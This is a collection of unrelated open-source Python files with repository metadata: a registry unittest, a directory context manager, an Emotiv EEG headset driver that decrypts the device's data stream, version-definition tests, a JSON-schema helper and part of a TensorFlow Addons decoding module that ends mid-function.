self.assertEqual(['zereg'], store.keys())
self.assertEqual(set(('appobject1', 'appobject2', 'appobject3')),
set(store['zereg']))
class RegistrableInstanceTC(TestCase):
def test_instance_modulename(self):
# no inheritance
obj = RegistrableInstance()
self.assertEqual(obj.__module__, 'unittest_registry')
# with inheritance from another python file
with prepended_syspath(self.datadir):
from regobjects2 import instance, MyRegistrableInstance
instance2 = MyRegistrableInstance()
self.assertEqual(instance.__module__, 'regobjects2')
self.assertEqual(instance2.__module__, 'unittest_registry')
if __name__ == '__main__':
unittest_main()
|
esparta/logilab_common3
|
test/unittest_registry.py
|
Python
|
gpl-2.0
| 6,824 | 0.001465 |
# /usr/bin/env python
import os
# Context manager
class cd:
"""
Context manager for safely changing the current working directory
"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
|
JohnGiorgi/SRA-RNAseq-Workflow
|
SRA_RNAseq_Workflow/helpers.py
|
Python
|
gpl-3.0
| 366 | 0.030055 |
# -*- coding: utf-8 -*-
"""
Emotiv acquisition :
Reverse engineering and original crack code written by
Cody Brocious (http://github.com/daeken)
Kyle Machulis (http://github.com/qdot)
Many thanks for their contribution.
Need python-crypto.
"""
import multiprocessing as mp
import numpy as np
import msgpack
import time
from collections import OrderedDict
from .base import DeviceBase
import platform
WINDOWS = (platform.system() == "Windows")
try:
import pywinusb.hid as hid
except:
pass
import os
from subprocess import check_output
from Crypto.Cipher import AES
from Crypto import Random
import Queue
tasks = Queue.Queue()
_channel_names = [ 'F3', 'F4', 'P7', 'FC6', 'F7', 'F8','T7','P8','FC5','AF4','T8','O2','O1','AF3']
sensorBits = {
'F3': [10, 11, 12, 13, 14, 15, 0, 1, 2, 3, 4, 5, 6, 7],
'FC5': [28, 29, 30, 31, 16, 17, 18, 19, 20, 21, 22, 23, 8, 9],
'AF3': [46, 47, 32, 33, 34, 35, 36, 37, 38, 39, 24, 25, 26, 27],
'F7': [48, 49, 50, 51, 52, 53, 54, 55, 40, 41, 42, 43, 44, 45],
'T7': [66, 67, 68, 69, 70, 71, 56, 57, 58, 59, 60, 61, 62, 63],
'P7': [84, 85, 86, 87, 72, 73, 74, 75, 76, 77, 78, 79, 64, 65],
'O1': [102, 103, 88, 89, 90, 91, 92, 93, 94, 95, 80, 81, 82, 83],
'O2': [140, 141, 142, 143, 128, 129, 130, 131, 132, 133, 134, 135, 120, 121],
'P8': [158, 159, 144, 145, 146, 147, 148, 149, 150, 151, 136, 137, 138, 139],
'T8': [160, 161, 162, 163, 164, 165, 166, 167, 152, 153, 154, 155, 156, 157],
'F8': [178, 179, 180, 181, 182, 183, 168, 169, 170, 171, 172, 173, 174, 175],
'AF4': [196, 197, 198, 199, 184, 185, 186, 187, 188, 189, 190, 191, 176, 177],
'FC6': [214, 215, 200, 201, 202, 203, 204, 205, 206, 207, 192, 193, 194, 195],
'F4': [216, 217, 218, 219, 220, 221, 222, 223, 208, 209, 210, 211, 212, 213]
}
quality_bits = [99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112]
def create_analog_subdevice_param(channel_names):
n = len(channel_names)
d = {
'type' : 'AnalogInput',
'nb_channel' : n,
'params' :{ },
'by_channel_params' : {
'channel_indexes' : range(n),
'channel_names' : channel_names,
}
}
return d
def get_info(device):
info = { }
info['class'] = 'EmotivMultiSignals'
if WINDOWS:
# EMOTIV
info['device_path'] = device.device_path
info['board_name'] = '{} #{}'.format(device.vendor_name, device.serial_number).replace('\n', '').replace('\r', '')
info['serial'] = device.serial_number
info['hid'] = device
else:
info['device_path'] = device
name = device_path.strip('/dev/')
realInputPath = os.path.realpath("/sys/class/hidraw/" + name)
path = '/'.join(realInputPath.split('/')[:-4])
with open(path + "/manufacturer", 'r') as f:
manufacturer = f.readline()
with open(path + "/serial", 'r') as f:
serial = f.readline().strip()
info['board_name'] = '{} #{}'.format(manufacturer, serial).replace('\n', '').replace('\r', '')
info['serial'] = serial
# PYACQ
info['global_params'] = {'buffer_length' : 60.,}
info['subdevices'] = [ ]
info['subdevices'].append(create_analog_subdevice_param(_channel_names))
quality_name = ['Quality {}'.format(n) for n in _channel_names]
info['subdevices'].append(create_analog_subdevice_param(quality_name))
info['subdevices'].append(create_analog_subdevice_param([ 'X','Y']))
return info
def dump(obj):
for attr in dir(obj):
print "obj.%s = %s" % (attr, getattr(obj, attr))
class EmotivMultiSignals(DeviceBase):
def __init__(self, **kargs):
DeviceBase.__init__(self, **kargs)
@classmethod
def get_available_devices(cls):
devices = OrderedDict()
if WINDOWS:
try:
for device in hid.find_all_hid_devices():
print "device : ", device
if (device.product_name == 'Emotiv RAW DATA' or device.product_name == 'EPOC BCI'):
devices['Emotiv '+device.serial_number] = get_info(device)
finally:
pass
else:
serials = { }
for name in os.listdir("/sys/class/hidraw"):
realInputPath = os.path.realpath("/sys/class/hidraw/" + name)
path = '/'.join(realInputPath.split('/')[:-4])
try:
with open(path + "/manufacturer", 'r') as f:
manufacturer = f.readline()
if "emotiv" in manufacturer.lower():
with open(path + "/serial", 'r') as f:
serial = f.readline().strip()
if serial not in serials:
serials[serial] = [ ]
serials[serial].append(name)
except IOError as e:
print "Couldn't open file: %s" % e
for serial, names in serials.items():
device_path = '/dev/'+names[1]
info = get_info(device_path)
devices['Emotiv '+device_path] = info
return devices
def configure(self, buffer_length = 60,
subdevices = None,
):
self.params = {'buffer_length' : buffer_length,
'subdevices' : subdevices,
}
self.__dict__.update(self.params)
self.configured = True
def initialize(self):
devices = EmotivMultiSignals.get_available_devices()
self.device = devices.values()[0]
if self.subdevices is None:
self.subdevices = self.device['subdevices']
self.sampling_rate = 128.
self.packet_size = 1
l = int(self.sampling_rate*self.buffer_length)
self.buffer_length = (l - l%self.packet_size)/self.sampling_rate
self.name = '{}'.format(self.device['board_name'])
self.streams = [ ]
for s, sub in enumerate(self.subdevices):
stream = self.streamhandler.new_AnalogSignalSharedMemStream(name = self.name+str(s) , sampling_rate = self.sampling_rate,
nb_channel = sub['nb_channel'], buffer_length = self.buffer_length,
packet_size = self.packet_size, dtype = np.float64,
channel_names = sub['by_channel_params']['channel_names'],
channel_indexes = sub['by_channel_params']['channel_indexes'],
)
self.streams.append(stream)
def start(self):
self.stop_flag = mp.Value('i', 0) #flag pultiproc = global
self.process = mp.Process(target = emotiv_mainLoop, args=(self.stop_flag, self.streams, self.device) )
self.process.start()
print 'FakeMultiAnalogChannel started:', self.name
self.running = True
def stop(self):
self.stop_flag.value = 1
self.process.join()
print 'FakeMultiAnalogChannel stopped:', self.name
self.running = False
def close(self):
if WINDOWS:
self.device['hid'].close()
else:
pass
# for ii in self.streams:
# self.streams[ii].stop()
def setupCrypto(serial):
type = 0 #feature[5]
type &= 0xF
type = 0
#I believe type == True is for the Dev headset, I'm not using that. That's the point of this library in the first place I thought.
k = ['\0'] * 16
k[0] = serial[-1]
k[1] = '\0'
k[2] = serial[-2]
if type:
k[3] = 'H'
k[4] = serial[-1]
k[5] = '\0'
k[6] = serial[-2]
k[7] = 'T'
k[8] = serial[-3]
k[9] = '\x10'
k[10] = serial[-4]
k[11] = 'B'
else:
k[3] = 'T'
k[4] = serial[-3]
k[5] = '\x10'
k[6] = serial[-4]
k[7] = 'B'
k[8] = serial[-1]
k[9] = '\0'
k[10] = serial[-2]
k[11] = 'H'
k[12] = serial[-3]
k[13] = '\0'
k[14] = serial[-4]
k[15] = 'P'
#It doesn't make sense to have more than one greenlet handling this as data needs to be in order anyhow. I guess you could assign an ID or something
#to each packet but that seems like a waste also or is it? The ID might be useful if your using multiple headsets or usb sticks.
key = ''.join(k)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_ECB, iv)
return cipher
def get_level(data, bits):
level = 0
for i in range(13, -1, -1):
level <<= 1
b, o = (bits[i] / 8) + 1, bits[i] % 8
level |= (ord(data[b]) >> o) & 1
return level
def emotiv_mainLoop(stop_flag, streams, device):
import zmq
abs_pos = pos = 0
#setup cryto
cipher = setupCrypto(device['serial'])
streamChan, streamImp, streamGyro = streams
#Data channels socket
context = zmq.Context()
socket_chan = context.socket(zmq.PUB)
socket_chan.bind("tcp://*:{}".format(streamChan['port']))
#Impedance channels socket
socket_imp = context.socket(zmq.PUB)
socket_imp.bind("tcp://*:{}".format(streamImp['port']))
#Gyro channels socket
socket_gyro = context.socket(zmq.PUB)
socket_gyro.bind("tcp://*:{}".format(streamGyro['port']))
packet_size = streamChan['packet_size']
sampling_rate = streamChan['sampling_rate']
np_arr_chan = streamChan['shared_array'].to_numpy_array()
np_arr_imp = streamImp['shared_array'].to_numpy_array()
np_arr_gyro = streamGyro['shared_array'].to_numpy_array()
half_size = np_arr_chan.shape[1]/2 # same for the others
impedance_qualities = { }
for name in _channel_names + ['X', 'Y', 'Unknown']:
impedance_qualities[name] = 0.
if WINDOWS:
device['hid'].open()
device['hid'].set_raw_data_handler(emotiv_handler)
else:
hidraw = open(device['device_path'])
while True:
# READ DATA
if WINDOWS:
crypted_data = tasks.get(True)
else:
crypted_data = hidraw.read(32)
# PROCESS
data = cipher.decrypt(crypted_data[:16]) + cipher.decrypt(crypted_data[16:])
# current impedance quality
sensor_num = ord(data[0])
num_to_name = { 0 : 'F3', 1:'FC5', 2 : 'AF3', 3 : 'F7', 4:'T7', 5 : 'P7',
6 : 'O1', 7 : 'O2', 8: 'P8', 9 : 'T8', 10: 'F8', 11 : 'AF4',
12 : 'FC6', 13: 'F4', 14 : 'F8', 15:'AF4',
64 : 'F3', 65 : 'FC5', 66 : 'AF3', 67 : 'F7', 68 : 'T7', 69 : 'P7',
70 : 'O1', 71 : 'O2', 72: 'P8', 73 : 'T8', 74: 'F8', 75 : 'AF4',
76 : 'FC6', 77: 'F4', 78 : 'F8', 79:'AF4',
80 : 'FC6',
}
if sensor_num in num_to_name:
sensor_name = num_to_name[sensor_num]
impedance_qualities[sensor_name] = get_level(data, quality_bits) / 540
for c, channel_name in enumerate(_channel_names):
bits = sensorBits[channel_name]
# channel value
value = get_level(data, bits)
np_arr_chan[c,pos] = value
np_arr_chan[c,pos+half_size] = value
#channel qualities
np_arr_imp[c,pos] = impedance_qualities[channel_name]
np_arr_imp[c,pos+half_size] = impedance_qualities[channel_name]
gyroX = ord(data[29]) - 106
gyroY = ord(data[30]) - 105
np_arr_gyro[:,pos] = [gyroX, gyroY]
np_arr_gyro[:,pos+half_size] = [gyroX, gyroY]
abs_pos += packet_size
pos = abs_pos%half_size
socket_chan.send(msgpack.dumps(abs_pos))
socket_imp.send(msgpack.dumps(abs_pos))
socket_gyro.send(msgpack.dumps(abs_pos))
if stop_flag.value:
print 'will stop'
break
# Windows handler
def emotiv_handler(data):
"""
Receives packets from headset for Windows. Sends them to the crypto process
"""
assert data[0] == 0
tasks.put_nowait(''.join(map(chr, data[1:])))
return True
Emotiv = EmotivMultiSignals
|
Hemisphere-Project/Telemir-DatabitMe
|
Telemir-EEG/pyacq/pyacq/core/devices/emotiv.py
|
Python
|
gpl-2.0
| 12,623 | 0.01323 |
import json
import pathlib
import re
import pytest
import snafu.versions
version_paths = list(snafu.versions.VERSIONS_DIR_PATH.iterdir())
version_names = [p.stem for p in version_paths]
@pytest.mark.parametrize('path', version_paths, ids=version_names)
def test_version_definitions(path):
assert path.suffix == '.json', '{} has wrong extension'.format(path)
assert re.match(r'^\d\.\d(?:\-32)?$', path.stem), \
'{} has invalid name'.format(path)
with path.open() as f:
data = json.load(f)
schema = data.pop('type')
possible_types = snafu.versions.InstallerType.__members__
assert schema in possible_types
assert isinstance(data.pop('version_info'), list)
if schema == 'cpython_msi':
for key in ('x86', 'amd64'):
d = data.pop(key)
assert d.pop('url')
assert re.match(r'^[a-f\d]{32}$', d.pop('md5_sum'))
elif schema == 'cpython':
assert data.pop('url')
assert re.match(r'^[a-f\d]{32}$', data.pop('md5_sum'))
assert not data, 'superfulous keys: {}'.format(', '.join(data.keys()))
def test_get_version_cpython_msi():
version = snafu.versions.get_version('3.4', force_32=False)
assert version == snafu.versions.CPythonMSIVersion(
name='3.4',
url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.amd64.msi',
md5_sum='963f67116935447fad73e09cc561c713',
version_info=(3, 4, 4),
)
def test_get_version_cpython_msi_switch():
version = snafu.versions.get_version('3.4', force_32=True)
assert version == snafu.versions.CPythonMSIVersion(
name='3.4',
url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi',
md5_sum='e96268f7042d2a3d14f7e23b2535738b',
version_info=(3, 4, 4),
)
def test_get_version_cpython():
version = snafu.versions.get_version('3.5', force_32=False)
assert version == snafu.versions.CPythonVersion(
name='3.5',
url='https://www.python.org/ftp/python/3.5.4/python-3.5.4-amd64.exe',
md5_sum='4276742a4a75a8d07260f13fe956eec4',
version_info=(3, 5, 4),
)
def test_get_version_cpython_switch():
version = snafu.versions.get_version('3.5', force_32=True)
assert version == snafu.versions.CPythonVersion(
name='3.5-32',
url='https://www.python.org/ftp/python/3.5.4/python-3.5.4.exe',
md5_sum='9693575358f41f452d03fd33714f223f',
version_info=(3, 5, 4),
forced_32=True,
)
def test_get_version_not_found():
with pytest.raises(snafu.versions.VersionNotFoundError) as ctx:
snafu.versions.get_version('2.8', force_32=False)
assert str(ctx.value) == '2.8'
@pytest.mark.parametrize('name, force_32, result', [
('3.6', False, 'Python 3.6'),
('3.6', True, 'Python 3.6-32'),
('3.4', False, 'Python 3.4'),
('3.4', True, 'Python 3.4'),
])
def test_str(name, force_32, result):
version = snafu.versions.get_version(name, force_32=force_32)
assert str(version) == result
@pytest.mark.parametrize('name, force_32, cmd', [
('3.6', False, 'python3.exe'),
('3.6', True, 'python3.exe'),
('2.7', False, 'python2.exe'),
('2.7', True, 'python2.exe'),
])
def test_python_major_command(mocker, name, force_32, cmd):
mocker.patch.object(snafu.versions, 'configs', **{
'get_scripts_dir_path.return_value': pathlib.Path(),
})
version = snafu.versions.get_version(name, force_32=force_32)
assert version.python_major_command == pathlib.Path(cmd)
@pytest.mark.parametrize('name, force_32, result', [
('3.6', False, '3.6'),
('3.6', True, '3.6'),
('3.4', False, '3.4'),
('3.4', True, '3.4'),
])
def test_arch_free_name(name, force_32, result):
version = snafu.versions.get_version(name, force_32=force_32)
assert version.arch_free_name == result
@pytest.mark.parametrize('name, force_32, result', [
('3.6', False, {'3.6'}),
('3.6', True, {'3.6', '3.6-32'}),
('3.6-32', False, {'3.6-32'}),
('3.4', False, {'3.4'}),
('3.4', True, {'3.4'}),
])
def test_script_version_names(name, force_32, result):
version = snafu.versions.get_version(name, force_32=force_32)
assert version.script_version_names == result
def test_is_installed(tmpdir, mocker):
mock_metadata = mocker.patch.object(snafu.versions, 'metadata', **{
'get_install_path.return_value': pathlib.Path(str(tmpdir)),
})
version = snafu.versions.get_version('3.6', force_32=False)
assert version.is_installed()
mock_metadata.get_install_path.assert_called_once_with('3.6')
|
uranusjr/snafu
|
tests/test_versions.py
|
Python
|
isc
| 4,596 | 0 |
import json
from os.path import join, dirname
from jsonschema import validate
SCHEMA_FILE = "normandy-schema.json"
def assert_valid_schema(data):
schema = _load_json_schema()
return validate(data, schema)
def _load_json_schema():
relative_path = join("schemas", SCHEMA_FILE)
absolute_path = join(dirname(__file__), relative_path)
with open(absolute_path) as schema_file:
return json.loads(schema_file.read())
|
mozilla/normandy
|
contract-tests/v3_api/support/assertions.py
|
Python
|
mpl-2.0
| 461 | 0 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base classes and functions for dynamic decoding."""
import abc
import tensorflow as tf
from tensorflow_addons.utils.types import TensorLike
from typeguard import typechecked
from typing import Any, Optional, Tuple, Union
# TODO: Find public API alternatives to these
from tensorflow.python.ops import control_flow_util
class Decoder(metaclass=abc.ABCMeta):
"""An RNN Decoder abstract interface object.
Concepts used by this interface:
- `inputs`: (structure of) tensors and TensorArrays that is passed as input
to the RNN cell composing the decoder, at each time step.
- `state`: (structure of) tensors and TensorArrays that is passed to the
RNN cell instance as the state.
- `finished`: boolean tensor telling whether each sequence in the batch is
finished.
- `training`: boolean whether it should behave in training mode or in
inference mode.
- `outputs`: instance of `tfa.seq2seq.BasicDecoderOutput`. Result of the decoding, at
each time step.
"""
@property
def batch_size(self):
"""The batch size of input values."""
raise NotImplementedError
@property
def output_size(self):
"""A (possibly nested tuple of...) integer[s] or `TensorShape`
object[s]."""
raise NotImplementedError
@property
def output_dtype(self):
"""A (possibly nested tuple of...) dtype[s]."""
raise NotImplementedError
@abc.abstractmethod
def initialize(self, name=None):
"""Called before any decoding iterations.
This methods must compute initial input values and initial state.
Args:
name: Name scope for any created operations.
Returns:
`(finished, initial_inputs, initial_state)`: initial values of
'finished' flags, inputs and state.
"""
raise NotImplementedError
@abc.abstractmethod
def step(self, time, inputs, state, training=None, name=None):
"""Called per step of decoding (but only once for dynamic decoding).
Args:
time: Scalar `int32` tensor. Current step number.
inputs: RNN cell input (possibly nested tuple of) tensor[s] for this
time step.
state: RNN cell state (possibly nested tuple of) tensor[s] from
previous time step.
training: Python boolean. Indicates whether the layer should behave
in training mode or in inference mode. Only relevant
when `dropout` or `recurrent_dropout` is used.
name: Name scope for any created operations.
Returns:
`(outputs, next_state, next_inputs, finished)`: `outputs` is an
object containing the decoder output, `next_state` is a (structure
of) state tensors and TensorArrays, `next_inputs` is the tensor that
should be used as input for the next step, `finished` is a boolean
tensor telling whether the sequence is complete, for each sequence in
the batch.
"""
raise NotImplementedError
def finalize(self, outputs, final_state, sequence_lengths):
raise NotImplementedError
@property
def tracks_own_finished(self):
"""Describes whether the Decoder keeps track of finished states.
Most decoders will emit a true/false `finished` value independently
at each time step. In this case, the `tfa.seq2seq.dynamic_decode` function keeps
track of which batch entries are already finished, and performs a
logical OR to insert new batches to the finished set.
Some decoders, however, shuffle batches / beams between time steps and
`tfa.seq2seq.dynamic_decode` will mix up the finished state across these entries
because it does not track the reshuffle across time steps. In this
case, it is up to the decoder to declare that it will keep track of its
own finished state by setting this property to `True`.
Returns:
Python bool.
"""
return False
class BaseDecoder(tf.keras.layers.Layer):
"""An RNN Decoder that is based on a Keras layer.
Concepts used by this interface:
- `inputs`: (structure of) Tensors and TensorArrays that is passed as input
to the RNN cell composing the decoder, at each time step.
- `state`: (structure of) Tensors and TensorArrays that is passed to the
RNN cell instance as the state.
- `memory`: tensor that is usually the full output of the encoder, which
will be used for the attention wrapper for the RNN cell.
- `finished`: boolean tensor telling whether each sequence in the batch is
finished.
- `training`: boolean whether it should behave in training mode or in
inference mode.
- `outputs`: instance of `tfa.seq2seq.BasicDecoderOutput`. Result of the decoding, at
each time step.
"""
@typechecked
def __init__(
self,
output_time_major: bool = False,
impute_finished: bool = False,
maximum_iterations: Optional[TensorLike] = None,
parallel_iterations: int = 32,
swap_memory: bool = False,
**kwargs,
):
self.output_time_major = output_time_major
self.impute_finished = impute_finished
self.maximum_iterations = maximum_iterations
self.parallel_iterations = parallel_iterations
self.swap_memory = swap_memory
super().__init__(**kwargs)
def call(self, inputs, initial_state=None, training=None, **kwargs):
init_kwargs = kwargs
init_kwargs["initial_state"] = initial_state
return dynamic_decode(
self,
output_time_major=self.output_time_major,
impute_finished=self.impute_finished,
maximum_iterations=self.maximum_iterations,
parallel_iterations=self.parallel_iterations,
swap_memory=self.swap_memory,
training=training,
decoder_init_input=inputs,
decoder_init_kwargs=init_kwargs,
)
@property
def batch_size(self):
"""The batch size of input values."""
raise NotImplementedError
@property
def output_size(self):
"""A (possibly nested tuple of...) integer[s] or `TensorShape`
object[s]."""
raise NotImplementedError
@property
def output_dtype(self):
"""A (possibly nested tuple of...) dtype[s]."""
raise NotImplementedError
def initialize(self, inputs, initial_state=None, **kwargs):
"""Called before any decoding iterations.
This methods must compute initial input values and initial state.
Args:
inputs: (structure of) tensors that contains the input for the
decoder. In the normal case, it's a tensor with shape
[batch, timestep, embedding].
initial_state: (structure of) tensors that contains the initial state
for the RNN cell.
**kwargs: Other arguments that are passed in from layer.call()
method. It could contains item like input `sequence_length`, or
masking for input.
Returns:
`(finished, initial_inputs, initial_state)`: initial values of
'finished' flags, inputs and state.
"""
raise NotImplementedError
def step(self, time, inputs, state, training):
"""Called per step of decoding (but only once for dynamic decoding).
Args:
time: Scalar `int32` tensor. Current step number.
inputs: RNN cell input (possibly nested tuple of) tensor[s] for this
time step.
state: RNN cell state (possibly nested tuple of) tensor[s] from
previous time step.
training: Python boolean. Indicates whether the layer should
behave in training mode or in inference mode.
Returns:
`(outputs, next_state, next_inputs, finished)`: `outputs` is an
object containing the decoder output, `next_state` is a
(structure of) state tensors and TensorArrays, `next_inputs` is the
tensor that should be used as input for the next step, `finished` is
a boolean tensor telling whether the sequence is complete, for each
sequence in the batch.
"""
raise NotImplementedError
def finalize(self, outputs, final_state, sequence_lengths):
raise NotImplementedError
@property
def tracks_own_finished(self):
"""Describes whether the Decoder keeps track of finished states.
Most decoders will emit a true/false `finished` value independently
at each time step. In this case, the `tfa.seq2seq.dynamic_decode` function keeps
track of which batch entries are already finished, and performs a
logical OR to insert new batches to the finished set.
Some decoders, however, shuffle batches / beams between time steps and
`tfa.seq2seq.dynamic_decode` will mix up the finished state across these entries
because it does not track the reshuffle across time steps. In this
case, it is up to the decoder to declare that it will keep track of its
own finished state by setting this property to `True`.
Returns:
Python bool.
"""
return False
# TODO(scottzhu): Add build/get_config/from_config and other layer methods.
@typechecked
def dynamic_decode(
decoder: Union[Decoder, BaseDecoder],
output_time_major: bool = False,
impute_finished: bool = False,
maximum_iterations: Optional[TensorLike] = None,
parallel_iterations: int = 32,
swap_memory: bool = False,
training: Optional[bool] = None,
scope: Optional[str] = None,
enable_tflite_convertible: bool = False,
**kwargs,
) -> Tuple[Any, Any, Any]:
"""Runs dynamic decoding with a decoder.
Calls `initialize()` once and `step()` repeatedly on the decoder object.
Args:
decoder: A `tfa.seq2seq.Decoder` or `tfa.seq2seq.BaseDecoder` instance.
output_time_major: Python boolean. Default: `False` (batch major). If
`True`, outputs are returned as time major tensors (this mode is
faster). Otherwise, outputs are returned as batch major tensors (this
adds extra time to the computation).
impute_finished: Python boolean. If `True`, then states for batch
entries which are marked as finished get copied through and the
corresponding outputs get zeroed out. This causes some slowdown at
each time step, but ensures that the final state and outputs have
the correct values and that backprop ignores time steps that were
marked as finished.
maximum_iterations: A strictly positive `int32` scalar, the maximum
allowed number of decoding steps. Default is `None` (decode until the
decoder is fully done).
parallel_iterations: Argument passed to `tf.while_loop`.
swap_memory: Argument passed to `tf.while_loop`.
training: Python boolean. Indicates whether the layer should behave
in training mode or in inference mode. Only relevant
when `dropout` or `recurrent_dropout` is used.
scope: Optional name scope to use.
enable_tflite_convertible: Python boolean. If `True`, then the variables
of `TensorArray` become of 1-D static shape. Also zero pads in the
output tensor will be discarded. Default: `False`.
**kwargs: dict, other keyword arguments for dynamic_decode. It might
contain arguments for `BaseDecoder` to initialize, which takes all
tensor inputs during call().
Returns:
`(final_outputs, final_state, final_sequence_lengths)`.
Raises:
ValueError: if `maximum_iterations` is provided but is not a scalar.
"""
with tf.name_scope(scope or "decoder"):
is_xla = (
not tf.executing_eagerly()
and control_flow_util.GraphOrParentsInXlaContext(
tf.compat.v1.get_default_graph()
)
)
if maximum_iterations is not None:
maximum_iterations = tf.convert_to_tensor(
maximum_iterations, dtype=tf.int32, name="maximum_iterations"
)
if maximum_iterations.shape.ndims != 0:
raise ValueError("maximum_iterations must be a scalar")
tf.debugging.assert_greater(
maximum_iterations,
0,
message="maximum_iterations should be greater than 0",
)
elif is_xla:
raise ValueError("maximum_iterations is required for XLA compilation.")
if isinstance(decoder, Decoder):
initial_finished, initial_inputs, initial_state = decoder.initialize()
else:
# For BaseDecoder that takes tensor inputs during call.
decoder_init_input = kwargs.pop("decoder_init_input", None)
decoder_init_kwargs = kwargs.pop("decoder_init_kwargs", {})
initial_finished, initial_inputs, initial_state = decoder.initialize(
decoder_init_input, **decoder_init_kwargs
)
if enable_tflite_convertible:
# Assume the batch_size = 1 for inference.
# So we can change 2-D TensorArray into 1-D by reshaping it.
tf.debugging.assert_equal(
decoder.batch_size,
1,
message="TFLite conversion requires a batch size of 1",
)
zero_outputs = tf.nest.map_structure(
lambda shape, dtype: tf.reshape(
tf.zeros(_prepend_batch(decoder.batch_size, shape), dtype=dtype),
[-1],
),
decoder.output_size,
decoder.output_dtype,
)
else:
zero_outputs = tf.nest.map_structure(
lambda shape, dtype: tf.zeros(
_prepend_batch(decoder.batch_size, shape), dtype=dtype
),
decoder.output_size,
decoder.output_dtype,
)
if maximum_iterations is not None:
initial_finished = tf.logical_or(initial_finished, 0 >= maximum_iterations)
initial_sequence_lengths = tf.zeros_like(initial_finished, dtype=tf.int32)
initial_time = tf.constant(0, dtype=tf.int32)
def _shape(batch_size, from_shape):
if not isinstance(from_shape, tf.TensorShape) or from_shape.ndims == 0:
return None
else:
batch_size = tf.get_static_value(
tf.convert_to_tensor(batch_size, name="batch_size")
)
return tf.TensorShape([batch_size]).concatenate(from_shape)
dynamic_size = maximum_iterations is None or not is_xla
# The dynamic shape `TensorArray` is not allowed in TFLite yet.
dynamic_size = dynamic_size and (not enable_tflite_convertible)
def _create_ta(s, d):
if enable_tflite_convertible:
# TFLite requires 1D element_shape.
if isinstance(s, tf.TensorShape) and s.ndims == 0:
s = (1,)
element_shape = s
else:
element_shape = _shape(decoder.batch_size, s)
return tf.TensorArray(
dtype=d,
size=0 if dynamic_size else maximum_iterations,
dynamic_size=dynamic_size,
element_shape=element_shape,
)
initial_outputs_ta = tf.nest.map_structure(
_create_ta, decoder.output_size, decoder.output_dtype
)
def condition(
unused_time,
unused_outputs_ta,
unused_state,
unused_inputs,
finished,
unused_sequence_lengths,
):
return tf.logical_not(tf.reduce_all(finished))
def body(time, outputs_ta, state, inputs, finished, sequence_lengths):
"""Internal while_loop body.
Args:
time: scalar int32 tensor.
outputs_ta: structure of TensorArray.
state: (structure of) state tensors and TensorArrays.
inputs: (structure of) input tensors.
finished: bool tensor (keeping track of what's finished).
sequence_lengths: int32 tensor (keeping track of time of finish).
Returns:
`(time + 1, outputs_ta, next_state, next_inputs, next_finished,
next_sequence_lengths)`.
```
"""
(next_outputs, decoder_state, next_inputs, decoder_finished) = decoder.step(
time, inputs, state, training
)
decoder_state_sequence_lengths = False
if decoder.tracks_own_finished:
next_finished = decoder_finished
lengths = getattr(decoder_state, "lengths", None)
if lengths is not None:
# sequence lengths are provided by decoder_state.lengths;
# overwrite our sequence lengths.
decoder_state_sequence_lengths = True
sequence_lengths = tf.cast(lengths, tf.int32)
else:
next_finished = tf.logical_or(decoder_finished, finished)
if decoder_state_sequence_lengths:
# Just pass something through the loop; at the next iteration
# we'll pull the sequence lengths from the decoder_state again.
next_sequence_lengths = sequence_lengths
else:
next_sequence_lengths = tf.where(
tf.logical_not(finished),
tf.fill(tf.shape(sequence_lengths), time + 1),
sequence_lengths,
)
tf.nest.assert_same_structure(state, decoder_state)
tf.nest.assert_same_structure(outputs_ta, next_outputs)
tf.nest.assert_same_structure(inputs, next_inputs)
# Zero out output values past finish
if impute_finished:
def zero_out_finished(out, zero):
if finished.shape.rank < zero.shape.rank:
broadcast_finished = tf.broadcast_to(
tf.expand_dims(finished, axis=-1), zero.shape
)
return tf.where(broadcast_finished, zero, out)
else:
return tf.where(finished, zero, out)
emit = tf.nest.map_structure(
zero_out_finished, next_outputs, zero_outputs
)
else:
emit = next_outputs
# Copy through states past finish
def _maybe_copy_state(new, cur):
# TensorArrays and scalar states get passed through.
if isinstance(cur, tf.TensorArray):
pass_through = True
else:
new.set_shape(cur.shape)
pass_through = new.shape.ndims == 0
if not pass_through:
broadcast_finished = tf.broadcast_to(
tf.expand_dims(finished, axis=-1), new.shape
)
return tf.where(broadcast_finished, cur, new)
else:
return new
if impute_finished:
next_state = tf.nest.map_structure(
_maybe_copy_state, decoder_state, state
)
else:
next_state = decoder_state
if enable_tflite_convertible:
# Reshape to 1-D.
emit = tf.nest.map_structure(lambda x: tf.reshape(x, [-1]), emit)
outputs_ta = tf.nest.map_structure(
lambda ta, out: ta.write(time, out), outputs_ta, emit
)
return (
time + 1,
outputs_ta,
next_state,
next_inputs,
next_finished,
next_sequence_lengths,
)
res = tf.while_loop(
condition,
body,
loop_vars=(
initial_time,
initial_outputs_ta,
initial_state,
initial_inputs,
initial_finished,
initial_sequence_lengths,
),
parallel_iterations=parallel_iterations,
maximum_iterations=maximum_iterations,
swap_memory=swap_memory,
)
final_outputs_ta = res[1]
final_state = res[2]
final_sequence_lengths = res[5]
final_outputs = tf.nest.map_structure(lambda ta: ta.stack(), final_outputs_ta)
try:
final_outputs, final_state = decoder.finalize(
final_outputs, final_state, final_sequence_lengths
)
except NotImplementedError:
pass
if not output_time_major:
if enable_tflite_convertible:
# Reshape the output to the original shape.
def _restore_batch(x):
return tf.expand_dims(x, [1])
final_outputs = tf.nest.map_structure(_restore_batch, final_outputs)
final_outputs = tf.nest.map_structure(_transpose_batch_time, final_outputs)
return final_outputs, final_state, final_sequence_lengths
def _prepend_batch(batch_size, shape):
"""Prepends the batch dimension to the shape.
If the batch_size value is known statically, this function returns a
TensorShape, otherwise a Tensor.
"""
if isinstance(batch_size, tf.Tensor):
static_batch_size = tf.get_static_value(batch_size)
else:
static_batch_size = batch_size
